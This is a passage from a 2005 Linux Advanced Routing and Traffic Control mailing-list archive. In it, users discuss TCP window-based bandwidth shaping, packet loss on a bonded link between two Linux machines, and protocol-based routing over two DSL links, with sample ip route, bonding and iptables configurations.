tcp >>window adjustment to do bandwidth shaping? >> >>Granted the basic idea is to set the window size to be RTT * bandwidth, >>but a quick squiz at google turns up mostly papers on how to implement >>this at the sender end with a view to some new magic TCP >>implementation. I'm really interested in notes on how to implement at >>the router side, perhaps with a view to writing a new QOS module. >> >>Biggest issue I can see right now is an architecture one, ie monitoring >>the incoming packet rate and then applying that to the outgoing ACK >>packets. > > > instead of shaping the incoming traffic and estimate rate from the > outgoing traffic, you can 'delay' the outgoing ACK, and estimate the rate > from the raise of the sequence number. > > so you just shape on the outgoing queue, without take care of the > incoming traffic. > > note that everything here is patented, so if you must have lawyers, if > you want to develop.. > > :-/ > > http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO2&Sect2=HITOFF&p=1&u=%2Fnetahtml%2Fsearch-bool.html&r=0&f=S&l=50&TERM1=packeteer&FIELD1=&co1=AND&TERM2=&FIELD2=&d=ptxt > Ewwww thats not nice - not that I know what those would stop you being able to do. I presume they just apply in the USA and wouldn't be enforcable in Europe yet as software patents are not allowed (yet)? Andy. From fdelawarde@wirelessmundi.com Thu Feb 10 02:10:24 2005 From: fdelawarde@wirelessmundi.com (Francois) Date: Thu, 10 Feb 2005 03:10:24 +0100 Subject: [LARTC] One "200Mbps" virtual link between 2 ethernet adaptators of 2 linux boxes. Message-ID: <20050210022030.D0D62408D@outpost.ds9a.nl> Hi, ------- ------- | B |eth0---------eth0| C | | |eth1---------eth1| | ------- ------- In an attempt to have the install setup to increase speed and/or = reliability of a link between two linux machines (for example in case of a wireless connection), I read that there were more than one solution, for example = the old eql driver, bonding driver and teql which all seem to be doing = almost the same thing (round robin on packets), or multipath routing using "nexthop" (maybe??). I would like to know if someone had done some = knowledge concerning same type of setup (no doubt, it's an advanced routing mailing-list) and could explain me how these solutions differ and which would could be the best? Also, I started testing a configuration in order to try the bonding = driver. ------- | A | | | ------- ___|__ |switch| |______| ------- | | ------- | B |eth0--- ---eth0| C | | |eth1---------eth1| | ------- ------- Machine A: (192.168.1.10) PC used to configure B&C (the only one that = has a screen) Machine B&C: Very simple bonding configuration: modprobe bonding mode=3D1 ip addr add dev bond0 192.168.1.1/24 brd + #for B and .2 for C ip link set bond0 up ip link set eth0 up ip link set eth1 up ifenslave bond0 eth0 eth1 The bad thing is: B pinging C has 50% packet lost which would mean = assuming that the round robin of the module works that a route from one of the interfaces doesn't reach C (pinging from A to 192.168.1.1 gives also = 50%). Anyone has an idea on this matter? Thank you very much! Fran=E7ois. From ro0ot@phreaker.net Wed Feb 9 08:40:47 2005 From: ro0ot@phreaker.net (ro0ot) Date: Wed, 09 Feb 2005 16:40:47 +0800 Subject: [LARTC] load balancing between two dsl links Message-ID: <4209CC8F.40406@phreaker.net> Hi, I am connected to two DSL providers (DSL 1 - 1Mbps downlink/384kbps uplink and DSL 2 - 2Mbps downlink/512kpbs uplink) I would like to only allow ftp, pop3 and http via the DSL 1 and only smtp, ipsec and pptp via DSL 2. How can I do so? Can I use iproute to route these protocols? Below is my ip routing: - # DSL 1 ip route add 2.2.2.208/30 dev eth0 src 2.2.2.210 table 1 ip route add default via 2.2.2.209 table 1 # DSL 2 ip route add 3.3.3.116/30 dev eth2 src 3.3.3.118 table 2 ip route add default via 3.3.3.117 table 2 ip rule add from 2.2.2.208/30 lookup 1 ip rule add from 3.3.3.116/30 lookup 2 ip route add 3.3.3.116/30 dev eth2 table 1 ip route add 10.59.2.0/24 dev eth1 table 1 ip route add 127.0.0.0/8 dev lo table 1 ip route add 2.2.2.208/30 dev eth0 table 2 ip route add 10.59.2.0/24 dev eth1 table 2 ip route add 127.0.0.0/8 dev lo table 2 ip route add default scope global nexthop via 2.2.2.209 dev eth0 weight 1 nexthop via 3.3.3.117 dev eth2 weight 1 Below is my iptables: - lanif="eth1" squid_box="10.59.2.3" lan_net="10.59.2.0/24" $ECHO 1 > /proc/sys/net/ipv4/ip_forward $IPTABLES -t nat -A PREROUTING -i $lanif -s ! $squid_box -p tcp --dport 80 -j DNAT --to $squid_box:3128 $IPTABLES -t nat -A POSTROUTING -o $lanif -s $lan_net -d $squid_box -j SNAT --to $lan_ip $IPTABLES -A FORWARD -s $lan_net -d $squid_box -i $lanif -o $lanif -p tcp --dport 3128 -j ACCEPT $IPTABLES -t nat -A POSTROUTING -j MASQUERADE Regards, ro0ot From fubar@us.ibm.com Thu Feb 10 05:58:46 2005 From: fubar@us.ibm.com (Jay Vosburgh) Date: Wed, 09 Feb 2005 21:58:46 -0800 Subject: [LARTC] One "200Mbps" virtual link between 2 ethernet adaptators of 2 linux boxes. In-Reply-To: Message from "Francois" of "Thu, 10 Feb 2005 03:10:24 +0100." <20050210022030.D0D62408D@outpost.ds9a.nl> Message-ID: <200502100558.j1A5wkZF031492@death.nxdomain.ibm.com> Francois wrote: > ------- > | A | > | | > ------- > ___|__ > |switch| > |______| > ------- | | ------- >| B |eth0--- ---eth0| C | >| |eth1---------eth1| | > ------- ------- > >Machine A: (192.168.1.10) PC used to configure B&C (the only one that has a >screen) >Machine B&C: Very simple bonding configuration: > > >modprobe bonding mode=1 >ip addr add dev bond0 192.168.1.1/24 brd + #for B and .2 for C >ip link set bond0 up >ip link set eth0 up >ip link set eth1 up >ifenslave bond0 eth0 eth1 > >The bad thing is: B pinging C has 50% packet lost which would mean assuming >that the round robin of the module works that a route from one of the >interfaces doesn't reach C (pinging from A to 192.168.1.1 gives also 50%). >Anyone has an idea on this matter? First, if you set up bonding this way, check to see if the slaves have routes that supercede the route for the bonding master device. The slaves should not have any routes at all, all routing decisions are made against the master device. When bonding is set up by hand, the slaves can end up with routes if they are up and active prior to being enslaved. It's not generally a problem when bonding is set up at boot time. Assuming for the moment that the routing is ok, I'm also curious as to which link loses packets (the "eth0s with switch" or the "eth1s no switch"). Looking at the /var/log/messages for information from the bonding driver would also be useful; you might also look into enabling some link monitoring (just in case). Lastly, trying to get a single TCP connection to, essentially, see N interface's worth of throughput is a surprisingly difficult problem. This is a topic that comes up fairly regularly on the bonding-devel list; below is an article I posted last fall. The below references a discussion about round robin performance as it scales up to 4 adapters from a few years ago; that was done with 100 Mb/sec hardware, but the same would apply to gigabit links. As somebody else pointed out, when round robin was originally implemented in bonding, state of the art was 10 Mb/sec, one packet per interrupt, and reordering wasn't a problem. Today